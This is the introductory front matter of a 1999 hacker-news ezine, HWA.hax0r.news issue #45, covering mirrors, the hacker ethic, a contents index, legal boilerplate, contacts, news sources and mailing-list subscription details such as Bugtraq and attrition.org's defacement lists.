[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
[=HWA'99/2000=] Number 45 Volume 1 1999 Dec 5th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"This newsletter/ezine has been Declassified for the phearing impaired"

[ Coverage ]

This is #45 covering Nov 28th to Dec 5th.
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Mailing list members: 447 Can we bump this up somewhat? spread the word!
==========================================================================
Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...
[ Hot Hits ]

.gov and .mil activity

There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good Is It Worth It Followup to
see our boys keeping up with the news...
- Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

[ HWA.hax0r.news ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#                                                                         @
@  The HWA website is sponsored by CUBESOFT communications I highly       #
#  recommend you consider these people for your web hosting needs,        @
@                                                                         #
#  Web site sponsored by CUBESOFT networks http://www.csoft.net           @
@  check them out for great fast web hosting!                             #
#                                                                         @
#  http://www.csoft.net/~hwa                                              @
@                                                                         #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

[ Hacker's Ethic ]

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic spirit.
That spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

 1 - Access to computers should be unlimited and total.
 2 - All information should be free.
 3 - Mistrust authority - promote decentralization.
 4 - Hackers should be judged by their hacking not bogus criteria such as
     degrees, age, race, or position.
 5 - You create art and beauty on a computer.
 6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

[ Formatting ]

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since
formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns, in the past I've endeavoured
to format all text to 80 cols except for articles and site statements and
urls which are posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in 1024x768 mode with
UEDIT....

- Ed

BTW if anyone can suggest a better editor than UEDIT for this thing send me
some email i'm finding it lacking in certain areas. Must be able to produce
standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

[ Mirrors ]

New mirror sites

*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
*** http://datatwirl.intranova.net
* NEW * http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

*   Crappy free sites but they offer 20M & I need the space...
**  Some issues are not located on these sites since they exceed the file
    size limitations imposed by the sites :-( please only use these if no
    other recourse is available.
*** Most likely to be up to date other than the main site.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

[ Synopsis ]

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see.
(remember i'm doing this for me, not you, the fact some people happen to
get a kick/use out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour of
love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how the
most famous/infamous hackers are the ones that get caught? there's a lot
to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #44
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by
and idle a while and say hi...

**************************************************************************
[ Efnet ]
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed        ***
***                                                                    ***
*** please join to discuss or impart news on from the zine and around  ***
*** the zine or just to hang out, we get some interesting visitors you ***
*** could be one of em.                                                ***
***                                                                    ***
*** Note that the channel isn't there to entertain you its purpose is  ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout.
*** Also if you want to promo your site or send in news tips           ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************

=--------------------------------------------------------------------------=

[ Contents ]

=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Yes It Is (Worth It) ............................................
04.0 .. ExplorerZip Shrinks, Becomes MiniZip ............................
05.0 .. Staples Files Suit Against Unknown Defacer ......................
06.0 .. Comet bows to consumer pressure..................................
07.0 .. Personal Info of Canadian ISP Users Leaked ......................
08.0 .. First Internet Piracy Case in Japan .............................
09.0 .. FBI Launches InfraGuard in Ohio .................................
10.0 .. National Gun Database Goes Online ...............................
11.0 .. Zero Knowledge Ships Freedom, Finally ...........................
12.0 .. OpenBSD 2.6 Ships ...............................................
13.0 .. Videon Was Warned of Data Loss ..................................
14.0 .. German Digital Signature Chip Broke .............................
15.0 .. IETF Members Under Investigation For Treason ....................
16.0 .. Jane's Releases Cyberterrorism Report ...........................
17.0 .. Car Radio Listening Habits Being Gathered .......................
18.0 .. CVE by Mitre Goes Online ........................................
19.0 .. Novell Head Victim of Online Credit Card Theft ..................
20.0 .. IDC Says E-Commerce Unsafe Most of the Time .....................
21.0 .. Attack Trees Help to Model Security Threats .....................
22.0 .. Pandora Updated .................................................
23.0 .. [sSh] Busted or Not? ...........................................
24.0 .. Response to Freedom Extraordinary ...............................
25.0 .. DCypher.net Team Created ........................................
26.0 .. Hackers Make it to Mars .........................................
27.0 .. Security Focus newsletter #17....................................
28.0 .. SQL 7 "Magic Packet" DoS.........................................
=-------------------------------------------------------------------------------=
AD.S   ..
          Post your site ads or etc here, if you can offer something in
          return thats tres cool, if not we'll consider ur ad anyways so
          send it in. ads for other zines are ok too btw just mention us
          in yours, please remember to include links and an email contact.
          Corporate ads will be considered also and if your company wishes
          to donate to or participate in the upcoming Canc0n99 event send
          in your suggestions and ads now...n.b date and time may be pushed
          back join mailing list for up to date information................
          Current dates: POSTPONED til further notice, place: TBA..........

Ha.Ha  .. Humour and puzzles ............................................
          Hey You!.......................................................
          =------=.......................................................
          Send in humour for this section! I need a laugh and its hard to
          find good stuff... ;)..........................................
SITE.1 .. Featured site, ................................................
H.W    .. Hacked Websites ...............................................
A.0    .. APPENDICES.....................................................
A.1    .. PHACVW linx and references.....................................
=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ Legal ]

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT
NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ Contacts ]

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can.

(w00t) please no more inflatable sheep or plastic dog droppings, or fake
vomit thanks.
Send all goodies to:

        HWA NEWS
        P.O BOX 44118
        370 MAIN ST. NORTH
        BRAMPTON, ONTARIO
        CANADA
        L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal
and send a poor guy a postcard preferably one that has some scenery from
your place of residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard, return
address not necessary, just a "hey guys being cool in Bahrain, take it
easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

[ Sources ]

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine .................
http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/        Electronic Underground Affiliation
http://ech0.cjb.net               ech0 Security
http://axon.jccc.net/hir/         Hackers Information Report
http://net-security.org           Net Security
http://www.403-security.org       Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

[ Submissions ]

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html

--

defaced [web page defacement announce list]

This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of the mail.

There will be two types of posts to this list:

1. brief announcements as we learn of a web defacement.
   this will include the site, date, and who signed the hack. we will also
   include a URL of a mirror of the hack.
2. at the end of the day, a summary will be posted of all the hacks of the
   day. these can be found on the mirror site listed under 'relevant links'

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit
security business. You do not have permission to forward this mail to
anyone related to the domain that was defaced.

enjoy.

List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

(1) It is low volume on a normal day. On days of many defacements, traffic
    may be increased. On a few days, it is a virtual mail flood. You have
    been warned. ;)

-=-

--

defaced summary [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced domains
on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.

There will be ONE type of post to this list:

1. a single nightly piece of mail listing all reported domains. the same
   information can be found on http://www.attrition.org/mirror/attrition/
   via sporadic updates.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used to solicit
security business. You do not have permission to forward this mail to
anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

defaced GM [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced
government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe
defaced-gm" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military (.mil)
   system defaced. the same information can be found on
   http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel
charged with tracking security incidents on government run networks.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit
security business. You do not have permission to forward this mail to
anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

--

defaced alpha [web page defacement announce list]

This is a low traffic mail list to announce via alpha-numeric pagers, all
publicly defaced government and military domains on a given day.
To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with
"subscribe defaced-alpha" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military (.mil)
   system defaced. the information will only include domain names. the
   same information can be found on
   http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel
charged with tracking security incidents on government run networks.
Further, it is designed for quick response and aimed at law enforcement
agencies like DCIS and the FBI.

To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within 12 hours of
receiving the mail to be subscribed. If the response is not received, it
is assumed the mail was not sent to your pager.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit
security business. You do not have permission to forward this mail to
anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993.
It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that reproduction
of those words without your permission in any medium outside the
distribution of this list may be challenged by you, the author.
For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information.

As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information.

Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to others that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits, new trojan horses and viruses, source of attacks and tell-tale signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com.

On the information resource front you will find a large database of the following:

* Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well as links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade.
* Products. An incredible number of categorized security products from over two hundred different vendors.
* Services. A large and focused directory of security services offered by vendors.
* Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly from our servers when possible.
* Tools. A large array of free security tools. Categorized and available for download.
* News: A vast number of security news articles going all the way back to 1995.
* Security Resources: A directory to other security resources on the net.

As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                                                   ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way I'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really.

Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list.

To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

